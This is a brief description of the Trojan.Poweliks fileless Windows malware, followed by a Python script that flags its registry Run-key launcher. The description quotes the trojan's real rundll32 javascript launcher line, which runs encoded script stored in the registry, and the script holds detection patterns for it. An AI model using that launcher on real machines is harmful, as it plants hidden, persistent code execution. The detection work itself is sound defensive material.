Trojan.Poweliks
Trojan.Poweliks is a Trojan virus that usually affects Windows core systems. It is designed to carry out a set of commands once it enters the system. The virus copies itself into the system files so that it is activated every time the system is rebooted. It usually installs adware and redirects the browser to advertising sites against the will of the user. The payload of the virus is written in an encrypted format in the Windows registry, making it difficult to remove. Trojan.Poweliks can connect to a remote host and transfer data gathered from the infected computer. It will also download an updated version of the Trojan and is capable of accepting commands from a remote attacker.
The code used to activate the virus in the system is given below.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")
The virus creates a subkey under the same registry key, which produces a read error when the user attempts to access it. The biggest challenge from this nasty virus arises from the fact that it infects the registry files of all users on the system. Even new users created on the system will be infected automatically.
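A defender-side triage of exported Run-key contents for the launcher pattern quoted above, as an added example that is not part of the original page. The indicator names, the `triage_run_key` helper and the sample entries are constructed for illustration, and an entry whose data is `None` is assumed to stand for a value the export tool could not read.

```python
import re
from urllib.parse import unquote

# Indicators taken from the launcher string quoted on this page.
INDICATORS = {
    "rundll32_javascript": re.compile(r"rundll32(\.exe)?\s*javascript:", re.I),
    "mshtml_runhtmlapplication": re.compile(r"mshtml\s*,\s*RunHTMLApplication", re.I),
    "jscript_encode": re.compile(r"language\s*=\s*jscript\.encode", re.I),
    "regread_of_run_key": re.compile(r"RegRead\(.*currentversion\\+run", re.I),
}
QUOTES = str.maketrans({"\u201c": '"', "\u201d": '"', "\u2018": "'", "\u2019": "'"})

def normalize(data):
    """Undo %xx escapes and typographic quotes so matching is robust."""
    return unquote(data).translate(QUOTES)

def score_value(data):
    """Return the sorted list of indicator names found in one Run value."""
    text = normalize(data)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def triage_run_key(entries):
    """entries: {value_name: data or None}. None = value could not be read."""
    findings = {}
    for name, data in entries.items():
        if data is None:
            findings[name] = ["unreadable_entry"]
            continue
        hits = score_value(data)
        # Require the rundll32+javascript pair, or any two indicators.
        if "rundll32_javascript" in hits or len(hits) >= 2:
            findings[name] = hits
    return findings

# Constructed sample export of a Run key (not real telemetry).
SAMPLE = {
    "OneDrive": r'"C:\Users\a\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "(Default)": r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")',
    "printer_helper": r"rundll32.exe printui.dll,PrintUIEntry /?",
    "<unreadable>": None,
}

if __name__ == "__main__":
    for name, hits in triage_run_key(SAMPLE).items():
        print(f"{name}: {', '.join(hits)}")
```

Because the page says every user profile is affected, the same check should be run against each user's exported Run key rather than only the current user's.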